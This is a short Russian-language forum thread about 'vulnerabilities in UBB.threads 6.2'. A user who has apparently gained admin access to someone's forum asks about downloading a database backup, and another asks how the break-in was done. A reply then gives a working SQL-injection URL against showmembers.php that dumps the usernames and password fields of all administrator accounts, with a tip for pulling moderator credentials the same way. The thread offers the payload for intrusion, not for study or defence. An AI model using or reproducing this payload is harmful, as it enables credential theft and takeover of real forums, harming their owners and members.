![]() |
Уязвимости в UBB.threads 6.2
Хола ! народ посоветуйте плиз...
ситуация такая... я в админке форума UBB.threads 6.2 папробовал сделать бэкап базы думал что произайдёт приблезительно тоже что и с phpBB, тоесть он хотябы придолжет скачять этот бэкап... но этого не произашло... )): чё делть... ?! мож кто сталкивался с этим.... |
скажи плиз, как ты его взломал?
|
UBB.threads 6.2.*-6.3.* sql-injection:
http://[host]/showmembers.php?Cat=&like=1'%20union%20select%20U_ LoginName,0,0,U_Password,0,0,0%20from%20w3t_Users where U_Status='Administrator'/* Выводим пассы всех админов... Заменяем Administrator на Moderator и получаем тоже тока для модеров. |
Цитата:
|
| Время: 02:38 |